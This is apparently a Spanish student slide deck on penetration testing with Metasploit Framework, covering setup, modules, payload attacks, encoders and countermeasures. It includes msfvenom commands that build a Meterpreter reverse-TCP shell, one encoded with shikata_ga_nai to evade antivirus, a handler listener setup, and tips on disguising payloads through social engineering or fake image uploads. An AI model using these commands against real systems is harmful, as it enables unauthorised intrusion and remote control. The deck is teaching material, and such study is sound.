“Pruebas de intrusión mediante
Metasploit Framework”
Erlaitz Parreño Muñoz
2º ASIX
índice
1. Introducción_________________________________________ 3
1. Introducción Seguridad ____________________________ 4-5
2. Sistema informático _______________________________ 6-7
3. Introducción Metasploit Framework __________________ 8
2. Metasploit Framework_________________________________ 9
1. Arquitectura ______________________________________ 10
2. Módulos _________________________________________ 11
3. Ataques con Payloads ___________________________ 12-19
4. Codificadores y Auxiliares ________________________ 20-22
5. Contramedidas ___________________________________ 23
3. Conclusión__________________________________________ 24
4. Bibliografía__________________________________________ 25
2
1. Introducción
- Comprometer sistemas y servicios mediante malware.
- Paso a paso con ejemplos prácticos.
- Demostración práctica.
Sir Francis Bacon. - “El conocimiento es poder”
3
1.1 Introducción Seguridad
-Tipos de hackers:
1) Hacker Sombrero blanco:
- Encontrar vulnerabilidades para reportarlas.
- Actuar bajo permiso.
- No hacer daño.
“El término ‘hacker’ es algo digno de admirar”
Chema Alonso.
4Imagen 1: José María Alonso (CDO Telefónica)
1.1 Introducción Seguridad
-Tipos de hackers:
2) Hacker de sombrero negro:
- Violar el código ético de la seguridad informática.
- Actuar para beneficio propio.
- Causar el mayor daño posible.
“Un fantasma en el sistema”
Kevin Mitnick
5Imagen 2: Kevin Mitnick
1.2 Sistema informático
HARDWARE:
- Necesitaremos hacer uso de la distribución de debian Kali-Linux o
Parrot Security OS.
- Partición de 40GB EXT4y 2GB de SWAP.
- Procesador Quad-Core 64 bits.
¿Porque Kali-Linux o Parrot?
6Imagen 3: Instalación gráfica Live-CD
1.2 Sistema informático
SOFTWARE
- Agregar los repositorios necesarios de Kali.
- Utilizar herramienta “Terminator”.
7Imagen 5: Herramienta Terminator (Kali)
1.3 Introducción Metasploit Framework
● Que es Metasploit Framework.
● Labor que realiza MSF en el pentesting.
● Herramienta de pago o código abierto.
8Imagen 7: Ninja Metasploit (ASCII)
Imagen 6: H.D Moore Autor Metasploit
2. Metasploit Framework
Imagen 8: Logo Metasploit Framework (ASCII) 9
2.1 Arquitectura
10Imagen 9: Arquitectura Metasploit Framework
2.2 Módulos
11Imagen 10: Inicio Metasploit Framework (KALI)
- Exploits: Fragmentos del software.
- Payloads: Carga que se ejecutará en la vulnerabilidad (Meterpreter).
- Nops: Ejecutar el payload satisfactoriamente en la memoria.
- Codificadores: Codificar la firma.
- Auxiliares: Vía de recolección de información.
2.3 Ataques con payloads
12
Imagen 11: Comando msfvenom (KALI)
“MSFVENOM”
- Generador de payloads
- Asociado a una reverse shell
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=<TU IP
Address> LPORT=<Tu Puerto> -f <formato> > fichero.*
2.3 Ataques con payloads
METERPRETER
- abreviatura de The Meta-Interpreter.
- Se ejecuta completamente en memoria.
- Controlar el host de un dispositivo mediante VNC.
Imagen 12: Ejecución shell Meterpreter (KALI) 13
2.3 Ataques con payloads
Configurar Payload
- use exploit/multi/handler (Acceso rápido backdoor)
- set lhost <IP>
- set lport <port>
- Run/Exploit (Escucha)
Imagen 13: Configurando payload (KALI) 14
2.3 Ataques con payloads
Ejecución Ataque vía scripting:
- Víctima tiene que ejecutar nuestro payload.
- Camuflar el payload.
- Ingeniería social.
Imagen 17: Ejecutando payload (Atacante) 15
2.3 Ataques con payloads
Ejecución Ataque vía web (PHP):
- Encontrar vulnerabilidad de subida de ficheros.
- Camuflar el payload (jpeg, png, gif).
- Enviar directamente el malware en php.
16
Imagen 15: Vulnerabilidad subida ficheros (Servidor) Imagen 16: Reverse shell (Atacante)
2.3 Ataques con payloads
Imagen 20: Ejecutando payload Python (Atacante)
17
2.3 Ataques con payloads
Servicios Específicos:
2.3 Ataques con payloads
Servicios Específicos:
2.4 Codificadores y Auxiliares
Módulos Auxiliares:
- Recolección de información como objetivo.
- Identificar Puertos, Servicios, Usuarios, etc.
- Protocolo SMB
Imagen 18: Versión SMB (MSF) 20
2.4 Codificadores y Auxiliares
Módulos Encoding:
- Evitar la detección antivirus de nuestro payload.
- Codificador XOR polimórfico.
- “No hay más remedio”.
- Sustitución de instrucciones dinámicas y el ordenamiento dinámico
de bloques.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP>
LPORT=<Puerto> -e x86/shikata_ga_nai -f exe > shell.exe
21
2.4 Codificadores y Auxiliares
Módulos Encoding (Iteraciones):
22
2.5 Contramedidas
Protegernos de un ataque:
- La actualización del sistema operativo y de aquellas aplicaciones más
vulnerables.
- Antivirus que sea capaz de detectar este tipo de scripts maliciosos.
- Monitorizar la red para localizar puertos TCP extraños.
23
Imagen 19: Bitdefender
3. Conclusión
- Ampliación de conocimientos en ciberseguridad.
- Entender la importancia de la herramienta.
- Configuraciones y fallos a lo largo del proyecto.
24
3. Bibliografía
https://www.offensive-security.com/metasploit-unleashed/binary-payloads/
https://security.stackexchange.com/questions/78594/choosing-encoder-for-payloads-in-metasploit
https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom
https://cybersecurity.upv.es/downloads/frop.pdf
https://es.wikipedia.org/wiki/Metasploit
http://www.elladodelmal.com/2018/03/metasploit-como-extender-las.html
http://www.reydes.com/d/?q=Fundamentos_de_Metasploit_Framework_para_la_Explotacion
https://netsec.ws/?p=331
25

Pruebas de intrusion mediante Metasploit Framework